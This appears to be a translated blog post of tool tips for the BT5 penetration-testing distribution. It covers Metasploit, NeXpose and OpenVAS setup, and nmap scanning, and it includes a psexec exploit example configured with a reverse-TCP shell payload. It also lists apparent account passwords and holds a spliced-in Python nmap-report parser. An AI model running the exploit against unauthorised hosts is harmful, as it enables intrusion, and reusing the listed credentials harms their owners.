Summary of common tool operation tips in BT5

程序员文章站 2022-04-09 15:08:18
Use nmap, Nessus, OpenVAS or NeXpose to obtain CVE and BID identifiers and other descriptive information, then search exploit-db.com and 1337.com for corresponding attack code.

0. Firewall: ufw, gufw
MetaSploitFramework:
exploits: modules that use a PAYLOAD; modules that do not use a PAYLOAD are Auxiliary
payload: the code that runs on the remote target host
encoders: help the PAYLOAD reach the target host
Nops: pad out the size of the PAYLOAD
############################
Nessus: choose .nessus (v1) as the format of the generated report
Example of using an exploit:
1) use exploit/windows/smb/psexec
set RHOST remoteip
set PAYLOAD windows/shell/reverse_tcp  # set the payload, i.e. the code that runs on the remote target host; usually one that provides a remote network service or a reverse connection
set LHOST listenip  # must be set when the PAYLOAD is a reverse connection
set LPORT 4444
set etc…
exploit
 ########################################################################
1. NeXpose
The scanner from Rapid7, which acquired msf; it is paired with msf, and vulnerabilities marked exploitable link to the corresponding msf attack modules.
NeXpose's default postgresql user is nxpgsql, port: 3780, and scanning is limited to 8 hosts
Choose nexpose simple xml as the format of the generated report.
nxadmin:A
Starting:
Go to the directory that contains the script that starts NeXpose:
$ cd [installation_directory]/nsc
Type the command to run the script:
$ ./nsc.sh
You can then watch the prompts of the running background process
or
/etc/init.d/nexposed restart  # starts it
Web access:
http://ip:3780
Where the name nexposed comes from:
$ cd [installation_directory]/nsc
Open the nexposeconsole.rc file in your preferred text editing program.
 Look for two consecutive lines that read:
#defines
NXP_ROOT=/opt/rapid7/nexpose
The directory in the second line is the default installation directory.
(NeXpose Software Installation and Quick-start Guide, page 16)
If you did not use the default directory for installation, change the directory path to the one you chose:
#defines
NXP_ROOT=[installation_directory]
Save and close the nexposeconsole.rc file.
Copy the nexposeconsole.rc file to the /etc/init.d directory, and give it the desired daemon name:
$ cp [installation_directory]/nexposeconsole.rc /etc/init.d/[daemon_name]
Ensure that the daemon can run:
$ chmod +x /etc/init.d/[daemon-name]
Make the daemon start when the operating systems starts:
$ update-rc.d [daemon_name] defaults
Manually starting, stopping, or restarting NeXpose as a daemon in Ubuntu
To manually start, stop, or restart NeXpose as a daemon:
$ /etc/init.d/[daemon_name] <start|stop|restart>
Uninstalling NeXpose:
1. Make sure to stop NeXpose. Otherwise, errors will occur when you reinstall the program.
If you are not running NeXpose as a daemon, simply type the quit command, and press Enter in the shell
in which you are running NeXpose.
If you are running NeXpose as a daemon, see Manually starting, stopping, or restarting NeXpose as a daemon in Ubuntu (on page 16).
2. Run the command to remove the program:
$ rm -fr [installation_directory]
####################################################
2. OpenVAS:
root:shift(AB), local id pwd is A
wangql:wangql#@!
Starting:
Enter on the command line:
openvassd
openvasmd
openvasad
gsad --http-only -a 127.0.0.1 -p 9392
openvasmd: manager, port 9390
openvasmd [OPTION...] - Manager of the Open Vulnerability Assessment System
gsad: Greenbone Security Assistant daemon, port 9392
gsad --http-only -a 127.0.0.1 -p 9392  # only this way does gsad start and become reachable from the web
Caution: there is a conflict between NeXpose and OpenVAS, especially with the gsad command above, so uninstall NeXpose before using gsad.

openvasad: administrator, used to add users, port 9393
Ports used: 9390, 9391, 9392, 9393
FIX: Start OpenVAS Scanner (openvassd).
FIX: Start OpenVAS Manager (openvasmd).
FIX: Start OpenVAS Administrator (openvasad).
FIX: Start Greenbone Security Assistant (gsad).
####################################################
3. Nessus
4. nmap
nmap -A -T4 192.168.10.3-254 -p 135
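As an added example (not from the original post), a Python script that parses the XML an nmap run like the one above would write with -oX and lists the live hosts with port 135 open, so the exposed RPC endpoints can be inventoried; the XML in the block is a constructed sample standing in for real scan output.

```python
"""Triage an nmap -oX report: list live hosts where port 135 (MSRPC) is open.

SAMPLE_NMAP_XML is a constructed sample standing in for what
`nmap -A -T4 192.168.10.3-254 -p 135 -oX scan.xml` would write.
"""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -A -T4 192.168.10.3-254 -p 135 -oX scan.xml">
  <host><status state="up"/>
    <address addr="192.168.10.3" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="135">
      <state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/>
    </port></ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.10.7" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="135">
      <state state="filtered"/><service name="msrpc"/>
    </port></ports>
  </host>
  <host><status state="down"/>
    <address addr="192.168.10.9" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

def open_ports(xml_text, port="135"):
    """Return {ip: service_name} for hosts that are up and have `port`/tcp open."""
    root = ET.fromstring(xml_text)
    found = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts carry no port data
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for p in host.findall("ports/port"):
            state = p.find("state")
            if p.get("portid") != port or state is None or state.get("state") != "open":
                continue  # filtered/closed ports are not exposures
            svc = p.find("service")
            found[addr.get("addr")] = svc.get("name", "?") if svc is not None else "?"
    return found

if __name__ == "__main__":
    for ip, svc in open_ports(SAMPLE_NMAP_XML).items():
        print(f"{ip}\t135/tcp open\t{svc}")
```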
5. load xmlrpc
Open with Armitage
msf console does not support displaying Chinese-encoded text
info exploit/windows/wins/ms04_045_ins